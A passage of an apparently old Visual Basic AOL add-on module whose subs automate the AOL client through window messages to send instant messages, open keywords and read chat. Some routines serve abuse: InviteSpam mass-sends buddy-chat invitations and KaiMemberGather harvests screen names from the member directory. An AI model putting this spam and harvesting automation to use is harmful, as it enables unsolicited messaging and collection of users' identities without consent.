  5315. IMButton& = FindWindowEx(IMWin&, 0&, "_AOL_Icon", vbNullString)
  5316. For imLong& = 1 To 9
  5317. IMButton& = FindWindowEx(IMWin&, IMButton&, "_AOL_Icon", vbNullString)
  5318. Next imLong&
  5319. End If
  5320.  
  5321. Call SendMessageByString(imEdit&, WM_SETTEXT, 0&, "$IM_ON")
  5322. Call SendMessageByString(imEdit2&, WM_SETTEXT, 0&, "im on")
  5323.  
  5324. If AOLVersion = "3" Then
  5325. Call SendMessage(IMButton&, WM_LBUTTONDOWN, 0&, 0&)
  5326. Call SendMessage(IMButton&, WM_LBUTTONUP, 0&, 0&)
  5327. Else
  5328. Call SendMessage(IMButton&, WM_KEYDOWN, VK_SPACE, 0&)
  5329. Call SendMessage(IMButton&, WM_KEYUP, VK_SPACE, 0&)
  5330. End If
  5331.  
  5332. Do
  5333. DoEvents
  5334. ciWin& = FindWindow("#32770", "America Online")
  5335. ciBut& = FindWindowEx(ciWin&, 0&, "Button", "OK")
  5336. Loop Until ciWin& <> 0& And ciBut& <> 0&
  5337.  
  5338. Call PostMessage(ciBut&, WM_KEYDOWN, VK_SPACE, 0&)
  5339. Call PostMessage(ciBut&, WM_KEYUP, VK_SPACE, 0&)
  5340.  
  5341. Call PostMessage(IMWin&, WM_CLOSE, 0&, 0&)
  5342. End Sub
  5343.  
  5344. Public Sub InstantMessage(screenname As String, Message As String)
  5345. 'sends an instant message
  5346. 'to a screen name w/ message
  5347. Dim aol As Long, mdi As Long, mWin As Long, mBut As Long
  5348. Dim IMWin As Long, imicon As Long, imLong As Long, imCNTL As Long, imEdit As Long
  5349.  
  5350. If AOLVersion = "2.5" Or AOLVersion = "3" Then
  5351. Call InstantMessage25(screenname$, Message$)
  5352. Exit Sub
  5353. End If
  5354.  
  5355. aol& = FindWindow("AOL Frame25", vbNullString)
  5356. mdi& = FindWindowEx(aol&, 0&, "MDIClient", vbNullString)
  5357.  
  5358. Call Keyword("aol://9293:" + screenname$)
  5359.  
  5360. Do
  5361. DoEvents
  5362. IMWin& = FindWindowEx(mdi&, 0&, "AOL Child", "Send Instant Message")
  5363. imicon& = FindWindowEx(IMWin&, 0&, "_AOL_Icon", vbNullString)
  5364. For imLong& = 1 To 8
  5365. imicon& = FindWindowEx(IMWin&, imicon&, "_AOL_Icon", vbNullString)
  5366. Next imLong&
  5367. imCNTL& = FindWindowEx(IMWin&, 0&, "RICHCNTL", vbNullString)
  5368. imEdit& = FindWindowEx(IMWin&, 0&, "_AOL_Edit", vbNullString)
  5369. Loop Until IMWin& <> 0& And imicon& <> 0& And imCNTL& <> 0& And imEdit& <> 0&
  5370.  
  5371. imicon& = FindWindowEx(IMWin&, 0&, "_AOL_Icon", vbNullString)
  5372. For imLong& = 1 To 8
  5373. imicon& = FindWindowEx(IMWin&, imicon&, "_AOL_Icon", vbNullString)
  5374. Next imLong&
  5375.  
  5376. Call SendMessageByString(imEdit&, WM_SETTEXT, 0&, screenname$)
  5377. Call SendMessageByString(imCNTL&, WM_SETTEXT, 0&, Message$)
  5378.  
  5379. pause (0.1)
  5380.  
  5381. Call SendMessage(imicon&, WM_LBUTTONDOWN, 0&, 0&)
  5382. Call SendMessage(imicon&, WM_LBUTTONUP, 0&, 0&)
  5383.  
  5384. Do
  5385. DoEvents
  5386. IMWin& = FindWindowEx(mdi&, 0&, "AOL Child", "Send Instant Message")
  5387. mWin& = FindWindow("#32770", "America Online")
  5388. mBut& = FindWindowEx(mWin&, 0&, "Button", "OK")
  5389. Loop Until IMWin& = 0& Or mWin& <> 0& And mBut& <> 0&
  5390.  
  5391. If mWin& <> 0& Then
  5392. Call PostMessage(mBut&, WM_KEYDOWN, VK_SPACE, 0&)
  5393. Call PostMessage(mBut&, WM_KEYUP, VK_SPACE, 0&)
  5394. Call PostMessage(IMWin&, WM_CLOSE, 0&, 0&)
  5395. End If
  5396. End Sub
  5397.  
  5398. Public Function InstantMessagePunt(screenname As String, Message As String) As Boolean
  5399. 'sends an instant message
  5400. 'to a screen name w/ message
  5401. Dim aol As Long, mdi As Long, mWin As Long, mBut As Long, mSta As Long, mStr As String
  5402. Dim IMWin As Long, imicon As Long, imLong As Long, imCNTL As Long, imEdit As Long
  5403.  
  5404. If AOLVersion = "2.5" Or AOLVersion = "3" Then
  5405. InstantMessagePunt = InstantMessagePunt25(screenname$, Message$)
  5406. Exit Function
  5407. End If
  5408.  
  5409. aol& = FindWindow("AOL Frame25", vbNullString)
  5410. mdi& = FindWindowEx(aol&, 0&, "MDIClient", vbNullString)
  5411.  
  5412. Call Keyword("aol://9293:" + screenname$)
  5413.  
  5414. Do
  5415. DoEvents
  5416. IMWin& = FindWindowEx(mdi&, 0&, "AOL Child", "Send Instant Message")
  5417. imicon& = FindWindowEx(IMWin&, 0&, "_AOL_Icon", vbNullString)
  5418. For imLong& = 1 To 8
  5419. imicon& = FindWindowEx(IMWin&, imicon&, "_AOL_Icon", vbNullString)
  5420. Next imLong&
  5421. imCNTL& = FindWindowEx(IMWin&, 0&, "RICHCNTL", vbNullString)
  5422. imEdit& = FindWindowEx(IMWin&, 0&, "_AOL_Edit", vbNullString)
  5423. Loop Until IMWin& <> 0& And imicon& <> 0& And imCNTL& <> 0& And imEdit& <> 0&
  5424.  
  5425. imicon& = FindWindowEx(IMWin&, 0&, "_AOL_Icon", vbNullString)
  5426. For imLong& = 1 To 8
  5427. imicon& = FindWindowEx(IMWin&, imicon&, "_AOL_Icon", vbNullString)
  5428. Next imLong&
  5429.  
  5430. Call SendMessageByString(imEdit&, WM_SETTEXT, 0&, screenname$)
  5431. Call SendMessageByString(imCNTL&, WM_SETTEXT, 0&, Message$)
  5432.  
  5433. pause (0.1)
  5434.  
  5435. Call SendMessage(imicon&, WM_LBUTTONDOWN, 0&, 0&)
  5436. Call SendMessage(imicon&, WM_LBUTTONUP, 0&, 0&)
  5437.  
  5438. Do
  5439. DoEvents
  5440. IMWin& = FindWindowEx(mdi&, 0&, "AOL Child", "Send Instant Message")
  5441. mWin& = FindWindow("#32770", "America Online")
  5442. mBut& = FindWindowEx(mWin&, 0&, "Button", "OK")
  5443. mSta& = FindWindowEx(mWin&, 0&, "Static", vbNullString)
  5444. mSta& = FindWindowEx(mWin&, mSta&, "Static", vbNullString)
  5445. mStr$ = GetText(mSta&)
  5446. Loop Until IMWin& = 0& Or mWin& <> 0& And mBut& <> 0& And mStr$ <> ""
  5447.  
  5448. If mWin& <> 0& Then
  5449. Call PostMessage(mBut&, WM_KEYDOWN, VK_SPACE, 0&)
  5450. Call PostMessage(mBut&, WM_KEYUP, VK_SPACE, 0&)
  5451. Call PostMessage(IMWin&, WM_CLOSE, 0&, 0&)
  5452. End If
  5453.  
  5454. If InStr(1, mStr$, "currently signed on") <> 0& Then
  5455. InstantMessagePunt = True
  5456. Else
  5457. InstantMessagePunt = False
  5458. End If
  5459. End Function
  5460.  
  5461. Public Sub InstantMessage25(screenname As String, Message As String)
  5462. 'sends an instant message
  5463. 'to a screen name w/ message
  5464. 'works for 3.0 and 2.5
  5465. Dim aol As Long, mdi As Long, IMWin As Long, imSN As Long
  5466. Dim IMmessage As Long, IMButton As Long, mWin As Long, mBut As Long, imLong As Long
  5467.  
  5468. aol& = FindWindow("AOL Frame25", vbNullString)
  5469. mdi& = FindWindowEx(aol&, 0&, "MDIClient", vbNullString)
  5470.  
  5471. 'Call KeyWord25("aol://9293:" + ScreenName$)
  5472. Call RunMenuByString("send an instant message")
  5473.  
  5474. Do
  5475. DoEvents
  5476. IMWin& = FindWindowEx(mdi&, 0&, "AOL Child", "Send Instant Message")
  5477. imSN& = FindWindowEx(IMWin&, 0&, "_AOL_Edit", vbNullString)
  5478. If AOLVersion = "2.5" Then
  5479. IMmessage& = FindWindowEx(IMWin&, imSN&, "_AOL_Edit", vbNullString)
  5480. Else
  5481. IMmessage& = FindWindowEx(IMWin&, 0&, "RICHCNTL", vbNullString)
  5482. End If
  5483. If AOLVersion = "2.5" Then
  5484. IMButton& = FindWindowEx(IMWin&, 0&, "_AOL_Button", "Send")
  5485. Else
  5486. IMButton& = FindWindowEx(IMWin&, 0&, "_AOL_Icon", vbNullString)
  5487. For imLong& = 1 To 8
  5488. IMButton& = FindWindowEx(IMWin&, IMButton&, "_AOL_Icon", vbNullString)
  5489. Next imLong&
  5490. End If
  5491. Loop Until IMWin& <> 0& And IMmessage& <> 0& And IMButton& <> 0&
  5492.  
  5493. Call SendMessageByString(imSN&, WM_SETTEXT, 0&, screenname$)
  5494. Call SendMessageByString(IMmessage&, WM_SETTEXT, 0&, Message$)
  5495.  
  5496. If AOLVersion = "2.5" Then
  5497. Call PostMessage(IMButton&, WM_KEYDOWN, VK_SPACE, 0&)
  5498. Call PostMessage(IMButton&, WM_KEYUP, VK_SPACE, 0&)
  5499. Else
  5500. Call PostMessage(IMButton&, WM_LBUTTONDOWN, 0&, 0&)
  5501. Call PostMessage(IMButton&, WM_LBUTTONUP, 0&, 0&)
  5502. End If
  5503.  
  5504. Do
  5505. DoEvents
  5506. mWin& = FindWindow("#32770", "America Online")
  5507. mBut& = FindWindowEx(mWin&, 0&, "Button", "OK")
  5508.  
  5509. IMWin& = FindWindowEx(mdi&, 0&, "AOL Child", "Send Instant Message")
  5510. Loop Until mWin& <> 0& And mBut& <> 0& Or IMWin& = 0&
  5511.  
  5512. If mWin& <> 0& Then
  5513. Call PostMessage(mBut&, WM_KEYDOWN, VK_SPACE, 0&)
  5514. Call PostMessage(mBut&, WM_KEYUP, VK_SPACE, 0&)
  5515. Call PostMessage(IMWin&, WM_CLOSE, 0&, 0&)
  5516. End If
  5517. End Sub
  5518.  
  5519. Public Function InstantMessagePunt25(screenname As String, Message As String) As Boolean
  5520. 'sends an instant message
  5521. 'to a screen name w/ message
  5522. 'works for 3.0 and 2.5
  5523. Dim aol As Long, mdi As Long, IMWin As Long, imSN As Long, mSta As Long, mStr As String
  5524. Dim IMmessage As Long, IMButton As Long, mWin As Long, mBut As Long, imLong As Long
  5525.  
  5526. aol& = FindWindow("AOL Frame25", vbNullString)
  5527. mdi& = FindWindowEx(aol&, 0&, "MDIClient", vbNullString)
  5528.  
  5529. Call RunMenuByString("send an instant message")
  5530.  
  5531. Do
  5532. DoEvents
  5533. IMWin& = FindWindowEx(mdi&, 0&, "AOL Child", "Send Instant Message")
  5534. imSN& = FindWindowEx(IMWin&, 0&, "_AOL_Edit", vbNullString)
  5535. If AOLVersion = "2.5" Then
  5536. IMmessage& = FindWindowEx(IMWin&, imSN&, "_AOL_Edit", vbNullString)
  5537. Else
  5538. IMmessage& = FindWindowEx(IMWin&, 0&, "RICHCNTL", vbNullString)
  5539. End If
  5540. If AOLVersion = "2.5" Then
  5541. IMButton& = FindWindowEx(IMWin&, 0&, "_AOL_Button", "Send")
  5542. Else
  5543. IMButton& = FindWindowEx(IMWin&, 0&, "_AOL_Icon", vbNullString)
  5544. For imLong& = 1 To 8
  5545. IMButton& = FindWindowEx(IMWin&, IMButton&, "_AOL_Icon", vbNullString)
  5546. Next imLong&
  5547. End If
  5548. Loop Until IMWin& <> 0& And IMmessage& <> 0& And IMButton& <> 0&
  5549.  
  5550. Call SendMessageByString(imSN&, WM_SETTEXT, 0&, screenname$)
  5551. Call SendMessageByString(IMmessage&, WM_SETTEXT, 0&, Message$)
  5552.  
  5553. If AOLVersion = "2.5" Then
  5554. Call PostMessage(IMButton&, WM_KEYDOWN, VK_SPACE, 0&)
  5555. Call PostMessage(IMButton&, WM_KEYUP, VK_SPACE, 0&)
  5556. Else
  5557. Call PostMessage(IMButton&, WM_LBUTTONDOWN, 0&, 0&)
  5558. Call PostMessage(IMButton&, WM_LBUTTONUP, 0&, 0&)
  5559. End If
  5560.  
  5561. Do
  5562. DoEvents
  5563. mWin& = FindWindow("#32770", "America Online")
  5564. mBut& = FindWindowEx(mWin&, 0&, "Button", "OK")
  5565. mSta& = FindWindowEx(mWin&, 0&, "Static", vbNullString)
  5566. mSta& = FindWindowEx(mWin&, mSta&, "Static", vbNullString)
  5567. mStr$ = GetText(mSta&)
  5568.  
  5569. IMWin& = FindWindowEx(mdi&, 0&, "AOL Child", "Send Instant Message")
  5570. Loop Until mWin& <> 0& And mBut& <> 0& And mStr$ <> "" Or IMWin& = 0&
  5571.  
  5572. If mWin& <> 0& Then
  5573. Call PostMessage(mBut&, WM_KEYDOWN, VK_SPACE, 0&)
  5574. Call PostMessage(mBut&, WM_KEYUP, VK_SPACE, 0&)
  5575. Call PostMessage(IMWin&, WM_CLOSE, 0&, 0&)
  5576. End If
  5577.  
  5578. If InStr(1, mStr$, "currently signed on") <> 0& Then
  5579. InstantMessagePunt25 = True
  5580. Else
  5581. InstantMessagePunt25 = False
  5582. End If
  5583. End Function
  5584.  
  5585. Public Sub InviteSpam(screenname As String, Message As String, KW As String)
  5586. 'i like this sub ;D
  5587. 'it spams / invites the screennames
  5588. 'you put in by using the buddy chat feature
  5589. 'on aol's buddylist
  5590. Dim aol As Long, mdi As Long, bWin As Long, bIcon As Long
  5591. Dim sWin As Long, sSN As Long, sMessage As Long, sKeyWord As Long
  5592. Dim sCheck As Long, sIcon As Long, sPrivate As Long
  5593. Dim sCancel As Long, mWin As Long, mBut As Long, bIcon2 As Long
  5594.  
  5595. aol& = FindWindow("AOL Frame25", vbNullString)
  5596. mdi& = FindWindowEx(aol&, 0&, "MDIClient", vbNullString)
  5597.  
  5598. bWin& = FindWindowEx(mdi&, 0&, "AOL Child", "Buddy List Window")
  5599. If bWin& = 0& Then
  5600. If AOLVersion = "4" Or AOLVersion = "5" Then
  5601. Call Keyword("bv")
  5602. Else
  5603. Call KeyWord25("bv")
  5604. End If
  5605.  
  5606. Do
  5607. DoEvents
  5608. bWin& = FindWindowEx(mdi&, 0&, "AOL Child", "Buddy List Window")
  5609. bIcon& = FindWindowEx(bWin&, 0&, "_AOL_Icon", vbNullString)
  5610. bIcon& = FindWindowEx(bWin&, bIcon&, "_AOL_Icon", vbNullString)
  5611. bIcon& = FindWindowEx(bWin&, bIcon&, "_AOL_Icon", vbNullString)
  5612. bIcon2& = FindWindowEx(bWin&, bIcon&, "_AOL_Icon", vbNullString)
  5613. Loop Until bWin& <> 0& And bIcon2& <> 0&
  5614. pause (0.5)
  5615. End If
  5616.  
  5617. bIcon& = FindWindowEx(bWin&, 0&, "_AOL_Icon", vbNullString)
  5618. bIcon& = FindWindowEx(bWin&, bIcon&, "_AOL_Icon", vbNullString)
  5619. bIcon& = FindWindowEx(bWin&, bIcon&, "_AOL_Icon", vbNullString)
  5620. bIcon& = FindWindowEx(bWin&, bIcon&, "_AOL_Icon", vbNullString)
  5621.  
  5622. Call SendMessage(bIcon&, WM_LBUTTONDOWN, 0&, 0&)
  5623. Call SendMessage(bIcon&, WM_LBUTTONUP, 0&, 0&)
  5624.  
  5625. Do
  5626. DoEvents
  5627. sWin& = FindWindowEx(mdi&, 0&, "AOL Child", "Buddy Chat")
  5628. sSN& = FindWindowEx(sWin&, 0&, "_AOL_Edit", vbNullString)
  5629. sMessage& = FindWindowEx(sWin&, sSN&, "_AOL_Edit", vbNullString)
  5630. sPrivate& = FindWindowEx(sWin&, sMessage&, "_AOL_Edit", vbNullString)
  5631. sKeyWord& = FindWindowEx(sWin&, sPrivate&, "_AOL_Edit", vbNullString)
  5632. If AOLVersion = "4" Or AOLVersion = "5" Then
  5633. sCheck& = FindWindowEx(sWin&, 0&, "_AOL_Checkbox", vbNullString)
  5634. sCheck& = FindWindowEx(sWin&, sCheck&, "_AOL_Checkbox", vbNullString)
  5635. Else
  5636. sCheck& = FindWindowEx(sWin&, 0&, "_AOL_Button", vbNullString)
  5637. sCheck& = FindWindowEx(sWin&, sCheck&, "_AOL_Button", vbNullString)
  5638. End If
  5639. sIcon& = FindWindowEx(sWin&, 0&, "_AOL_Icon", vbNullString)
  5640. sCancel& = FindWindowEx(sWin&, sIcon&, "_AOL_Icon", vbNullString)
  5641. Loop Until sWin& <> 0& And sKeyWord& <> 0& And sCheck <> 0& And sIcon <> 0&
  5642.  
  5643. Call SendMessage(sCheck&, WM_LBUTTONDOWN, 0&, 0&)
  5644. Call SendMessage(sCheck&, WM_LBUTTONUP, 0&, 0&)
  5645. Call SendMessage(sCheck&, WM_KEYDOWN, VK_SPACE, 0&)
  5646. Call SendMessage(sCheck&, WM_KEYUP, VK_SPACE, 0&)
  5647.  
  5648. Call SendMessageByString(sSN&, WM_SETTEXT, 0&, screenname$)
  5649. Call SendMessageByString(sMessage&, WM_SETTEXT, 0&, Message$)
  5650. Call SendMessageByString(sKeyWord&, WM_SETTEXT, 0&, KW$)
  5651. Call SendMessageByString(sPrivate&, WM_SETTEXT, 0&, "")
  5652.  
  5653. Call SendMessage(sIcon&, WM_LBUTTONDOWN, 0&, 0&)
  5654. Call SendMessage(sIcon&, WM_LBUTTONUP, 0&, 0&)
  5655.  
  5656. Do
  5657. DoEvents
  5658. sWin& = FindWindowEx(mdi&, 0&, "AOL Child", "Buddy Chat")
  5659.  
  5660. mWin& = FindWindow("#32770", "America Online")
  5661. mBut& = FindWindowEx(mWin&, 0&, "Button", "OK")
  5662. Loop Until sWin& <> 0& Or mWin& <> 0& And mBut& <> 0&
  5663.  
  5664. If mWin& <> 0& Then
  5665. Call PostMessage(mWin&, WM_KEYDOWN, VK_SPACE, 0&)
  5666. Call PostMessage(mWin&, WM_KEYUP, VK_SPACE, 0&)
  5667.  
  5668. Call SendMessage(sCancel&, WM_LBUTTONDOWN, 0&, 0&)
  5669. Call SendMessage(sCancel&, WM_LBUTTONUP, 0&, 0&)
  5670. End If
  5671. End Sub
  5672.  
  5673. Public Sub KaiMemberGather(Search As String, list As ListBox, AddOnliners As Boolean)
  5674. 'i'd like to thank db's brain
  5675. 'for giving me the idea
  5676. 'to make an elite m/d
  5677. 'gatherer just like this one
  5678. 'thx db -=]
  5679.  
  5680. 'this m/d gather is different
  5681. 'from the other m/d gather because:
  5682.  
  5683. 'instead of clicking the 'more' button
  5684. 'until aol gets an 'internal error'...
  5685.  
  5686. 'this gets the text of the static above
  5687. 'the list, and using the static, it
  5688. 'decides how many times it should click the
  5689. '"more" button. i haven't fully tested this
  5690. 'on every type of situation possible, which
  5691. 'is why i kept the other gather just in case
  5692.  
  5693. Dim aol As Long, mdi As Long, kai As Long, ListAmount As Long
  5694. Dim mWin As Long, medit As Long, micon As Long, mCheck As Long, mCheckState As Long
  5695. Dim sWin As Long, sList As Long, sIcon As Long, sCount As Long, sStatic As Long, sString As String, sAmount As String
  5696. Dim mgWin As Long, mgBut As Long, firstcount As Long, SecondCount As Long, sOf As Long, sGay As String, lGay As Long
  5697.  
  5698. aol& = FindWindow("AOL Frame25", vbNullString)
  5699. mdi& = FindWindowEx(aol&, 0&, "MDIClient", vbNullString)
  5700. mWin& = FindWindowEx(mdi&, 0&, "AOL Child", "Member Directory")
  5701.  
  5702. If mWin& = 0& Then
  5703. Call Keyword("profile")
  5704. End If
  5705.  
  5706. Do
  5707. DoEvents
  5708. aol& = FindWindow("AOL Frame25", vbNullString)
  5709. mdi& = FindWindowEx(aol&, 0&, "MDIClient", vbNullString)
  5710. mWin& = FindWindowEx(mdi&, 0&, "AOL Child", "Member Directory")
  5711. medit& = FindWindowEx(mWin&, 0&, "_AOL_Edit", vbNullString)
  5712. micon& = FindWindowEx(mWin&, 0&, "_AOL_Icon", vbNullString)
  5713. micon& = FindWindowEx(mWin&, micon&, "_AOL_Icon", vbNullString)
  5714. micon& = FindWindowEx(mWin&, micon&, "_AOL_Icon", vbNullString)
  5715. micon& = FindWindowEx(mWin&, micon&, "_AOL_Icon", vbNullString)
  5716. mCheck& = FindWindowEx(mWin&, 0&, "_AOL_Checkbox", vbNullString)
  5717. mCheck& = FindWindowEx(mWin&, mCheck&, "_AOL_Checkbox", vbNullString)
  5718. mCheck& = FindWindowEx(mWin&, mCheck&, "_AOL_Checkbox", vbNullString)
  5719. mCheck& = FindWindowEx(mWin&, mCheck&, "_AOL_Checkbox", vbNullString)
  5720. mCheck& = FindWindowEx(mWin&, mCheck&, "_AOL_Checkbox", vbNullString)
  5721. Loop Until mWin& <> 0& And medit& <> 0& And micon& <> 0& And mCheck& <> 0&
  5722.  
  5723. If AddOnliners = True Then
  5724. Do
  5725. DoEvents
  5726. Call SendMessage(mCheck&, WM_LBUTTONDOWN, 0&, 0&)
  5727. Call SendMessage(mCheck&, WM_LBUTTONUP, 0&, 0&)
  5728. mCheckState& = SendMessage(mCheck&, BM_GETCHECK, 0&, 0&)
  5729. Loop Until mCheckState& = 1&
  5730. ElseIf AddOnliners = False Then
  5731. Do
  5732. DoEvents
  5733. Call SendMessage(mCheck&, WM_LBUTTONDOWN, 0&, 0&)
  5734. Call SendMessage(mCheck&, WM_LBUTTONUP, 0&, 0&)
  5735. mCheckState& = SendMessage(mCheck&, BM_GETCHECK, 0&, 0&)
  5736. Loop Until mCheckState& = 0&
  5737. End If
  5738.  
  5739. Call SendMessageByString(medit&, WM_SETTEXT, 0&, Search$)
  5740.  
  5741. Call SendMessageLong(medit&, WM_CHAR, ENTER_KEY, 0&)
  5742. Call SendMessage(micon&, WM_LBUTTONDOWN, 0&, 0&)
  5743. Call SendMessage(micon&, WM_LBUTTONUP, 0&, 0&)
  5744.  
  5745. Do
  5746. DoEvents
  5747. mgWin& = FindWindow("#32770", "America Online")
  5748. mgBut& = FindWindowEx(mgWin&, 0&, "Button", "OK")
  5749. aol& = FindWindow("AOL Frame25", vbNullString)
  5750. mdi& = FindWindowEx(aol&, 0&, "MDIClient", vbNullString)
  5751. sWin& = FindWindowEx(mdi&, 0&, "AOL Child", "Member Directory Search Results")
  5752. sList& = FindWindowEx(sWin&, 0&, "_AOL_Listbox", vbNullString)
  5753. sIcon& = FindWindowEx(sWin&, 0&, "_AOL_Icon", vbNullString)
  5754. sStatic& = FindWindowEx(sWin&, 0&, "_AOL_Static", vbNullString)
  5755. Loop Until mgWin& <> 0& And mgBut& <> 0& Or sWin& <> 0& And sList& <> 0& And sIcon& <> 0& And sStatic& <> 0&
  5756.  
  5757. If mgWin& <> 0& Then
  5758. Call PostMessage(mgBut&, WM_KEYDOWN, VK_SPACE, 0&)
  5759. Call PostMessage(mgBut&, WM_KEYUP, VK_SPACE, 0&)
  5760. ElseIf sWin& <> 0& Then
  5761. Do
  5762. DoEvents
  5763. sCount& = SendMessage(sList&, LB_GETCOUNT, 0&, 0&)
  5764. Loop Until sCount& <> 0&
  5765.  
  5766. pause (0.6)
  5767.  
  5768. sString$ = GetText(sStatic&)
  5769.  
  5770. sOf& = InStr(1, sString$, " of ")
  5771. sAmount$ = Mid(sString, sOf& + 4&, 2&)
  5772.  
  5773. If Left(sAmount$, 1&) = "1" Or Len(Trim(sAmount$)) = 1& Then
  5774. ListAmount& = 1&
  5775. ElseIf Left(sAmount$, 1&) = "2" Or Left(sAmount$, 1&) = "3" Then
  5776. If Left(sAmount$, 1&) = "2" And Right(sAmount$, 1&) = "0" Then
  5777. ListAmount& = 1&
  5778. Else
  5779. ListAmount& = 2&
  5780. End If
  5781. ElseIf Left(sAmount$, 1&) = "4" Or Left(sAmount$, 1&) = "5" Then
  5782. If Left(sAmount$, 1&) = "4" And Right(sAmount$, 1&) = "0" Then
  5783. ListAmount& = 2&
  5784. Else
  5785. ListAmount& = 3&
  5786. End If
  5787. ElseIf Left(sAmount$, 1&) = "6" Or Left(sAmount$, 1&) = "7" Then
  5788. If Left(sAmount$, 1&) = "6" And Right(sAmount$, 1&) = "0" Then
  5789. ListAmount& = 3&
  5790. Else
  5791. ListAmount& = 4&
  5792. End If
  5793. ElseIf Left(sAmount$, 1&) = "8" Or Left(sAmount$, 1&) = "9" Then
  5794. If Left(sAmount$, 1&) = "8" And Right(sAmount$, 1&) = "0" Then
  5795. ListAmount& = 4&
  5796. Else
  5797. ListAmount& = 5&
  5798. End If
  5799. ElseIf Left(sAmount$, 1&) = "o" Then
  5800. ListAmount& = 5&
  5801. End If
  5802.  
  5803. For kai& = 1 To ListAmount& - 1
  5804.  
  5805. sIcon& = FindWindowEx(sWin&, 0&, "_AOL_Icon", vbNullString)
  5806. Call SendMessage(sIcon&, WM_LBUTTONDOWN, 0&, 0&)
  5807. Call SendMessage(sIcon&, WM_LBUTTONUP, 0&, 0&)
  5808.  
  5809. Do
  5810. DoEvents
  5811. firstcount& = SendMessage(sList&, LB_GETCOUNT, 0&, 0&)
  5812. pause (0.6)
  5813. SecondCount& = SendMessage(sList&, LB_GETCOUNT, 0&, 0&)
  5814. mgWin& = FindWindow("#32770", "America Online")
  5815. mgBut& = FindWindowEx(mgWin&, 0&, "Button", "OK")
  5816. Loop Until firstcount& <> SecondCount& Or mgWin& <> 0& And mgBut& <> 0&
  5817. Next kai&
  5818.  
  5819. Call MemberList(sList&, list)
  5820.  
  5821. Call PostMessage(sWin&, WM_CLOSE, 0&, 0&)
  5822. Do
  5823. DoEvents
  5824. sWin& = FindWindowEx(mdi&, 0&, "AOL Child", "Member Directory Search Results")
  5825. Loop Until sWin& = 0&
  5826. End If
  5827. End Sub
  5828.  
  5829. Public Sub Keyword(KW As String)
  5830. 'goes to keyword on aol
  5831. Dim aol As Long, mdi As Long, TBar As Long, kCombo As Long
  5832. Dim tWin As Long, kEdit As Long, tb As Long
  5833.  
  5834. If AOLVersion = "3" Or AOLVersion = "2.5" Then
  5835. Call KeyWord25(KW$)
  5836. Exit Sub
  5837. End If
  5838.  
  5839. aol& = FindWindow("AOL Frame25", vbNullString)
  5840. mdi& = FindWindowEx(aol&, 0&, "MDIClient", vbNullString)
  5841.  
  5842. tb& = FindWindowEx(aol&, 0&, "AOL Toolbar", vbNullString)
  5843. TBar& = FindWindowEx(tb&, 0&, "_AOL_Toolbar", vbNullString)
  5844. kCombo& = FindWindowEx(TBar&, 0&, "_AOL_Combobox", vbNullString)
  5845. kEdit& = FindWindowEx(kCombo&, 0&, "Edit", vbNullString)
  5846.  
  5847. Call SendMessageByString(kEdit&, WM_SETTEXT, 0&, KW$)
  5848.  
  5849. Call SendMessageLong(kEdit&, WM_CHAR, VK_SPACE, 0&)
  5850. Call SendMessageLong(kEdit&, WM_CHAR, VK_RETURN, 0&)
  5851.  
  5852. End Sub
  5853.  
  5854. Public Sub KeyWord25(KW As String)
  5855. 'goes to keyword on aol 2.5 and 3.0
  5856. Dim aol As Long, mdi As Long, TBar As Long, tIcon As Long
  5857. Dim tLong As Long, kWin As Long, kEdit As Long
  5858.  
  5859. aol& = FindWindow("AOL Frame25", vbNullString)
  5860. mdi& = FindWindowEx(aol&, 0&, "MDIClient", vbNullString)
  5861.  
  5862. TBar& = FindWindowEx(aol&, 0&, "AOL Toolbar", vbNullString)
  5863. tIcon& = FindWindowEx(TBar&, 0&, "_AOL_Icon", vbNullString)
  5864. If AOLVersion = "2.5" Then
  5865. For tLong& = 1 To 12
  5866. tIcon& = FindWindowEx(TBar&, tIcon&, "_AOL_Icon", vbNullString)
  5867. Next tLong
  5868. ElseIf AOLVersion = "3" Then
  5869. For tLong& = 1 To 17
  5870. tIcon& = FindWindowEx(TBar&, tIcon&, "_AOL_Icon", vbNullString)
  5871. Next tLong
  5872. End If
  5873.  
  5874. Call SendMessage(tIcon&, WM_LBUTTONDOWN, 0&, 0&)
  5875. Call SendMessage(tIcon&, WM_LBUTTONUP, 0&, 0&)
  5876.  
  5877. Do
  5878. DoEvents
  5879. kWin& = FindWindowEx(mdi&, 0&, "AOL Child", "Keyword")
  5880. kEdit& = FindWindowEx(kWin&, 0&, "_AOL_Edit", vbNullString)
  5881. Loop Until kWin& <> 0& And kEdit& <> 0&
  5882.  
  5883. Call SendMessageByString(kEdit&, WM_SETTEXT, 0&, KW$)
  5884. Call SendMessageLong(kEdit&, WM_CHAR, ENTER_KEY, 0&)
  5885. End Sub
  5886.  
  5887. Public Sub killwait()
  5888. 'gets rid of the hourglass on aol
  5889. Dim KWWin As Long, kwIcon As Long
  5890.  
  5891. Call ModalKill
  5892.  
  5893. Call RunMenuByString("&About America Online")
  5894.  
  5895. Do
  5896. DoEvents
  5897. KWWin& = FindWindow("_AOL_Modal", vbNullString)
  5898. kwIcon& = FindWindowEx(KWWin&, 0&, "_AOL_Icon", vbNullString)
  5899. Loop Until KWWin& <> 0& And kwIcon& <> 0&
  5900.  
  5901. Do
  5902. DoEvents
  5903. KWWin& = FindWindow("_AOL_Modal", vbNullString)
  5904. Call SendMessage(kwIcon&, WM_LBUTTONDOWN, 0&, 0&)
  5905. Call SendMessage(kwIcon&, WM_LBUTTONUP, 0&, 0&)
  5906. Loop Until KWWin& = 0&
  5907.  
  5908. End Sub
  5909.  
  5910. Public Function LastChatLine() As String
  5911. 'gets the last line of the chat [sn included]
  5912. 'to make a c-com, u'd put this into a timer w/ interval set to '1'
  5913.  
  5914. '-=start copying c-com code=-
  5915.  
  5916. 'Dim ScreenName As String, Message As String
  5917. 'Static Length As Long, Length2 As Long
  5918. '
  5919. 'Length2 = ChatLength
  5920. 'If Length < Length2 Then
  5921. ' ScreenName$ = SNFromLastChatLine(LastChatLine)
  5922. ' Message$ = LastChatLineMessage(LastChatLine)
  5923. ' If ScreenName$ = GetUser Then
  5924. ' If Message = ".testing" Then
  5925. ' Call ChatSend("this thing works")
  5926. ' End If
  5927. ' End If
  5928. 'End If
  5929. 'Length = ChatLength
  5930.  
  5931. '-=stop copying c-com code=-
  5932.  
  5933. Dim rWin As Long, rCNTL As Long
  5934. Dim rChr As Long, rChr2 As Long, rText As String
  5935.  
  5936. If AOLVersion = "4" Or AOLVersion = "5" Then
  5937. rWin& = FindRoom
  5938. rCNTL& = FindWindowEx(rWin&, 0&, "RICHCNTL", vbNullString)
  5939. Else
  5940. rWin& = FindRoom25
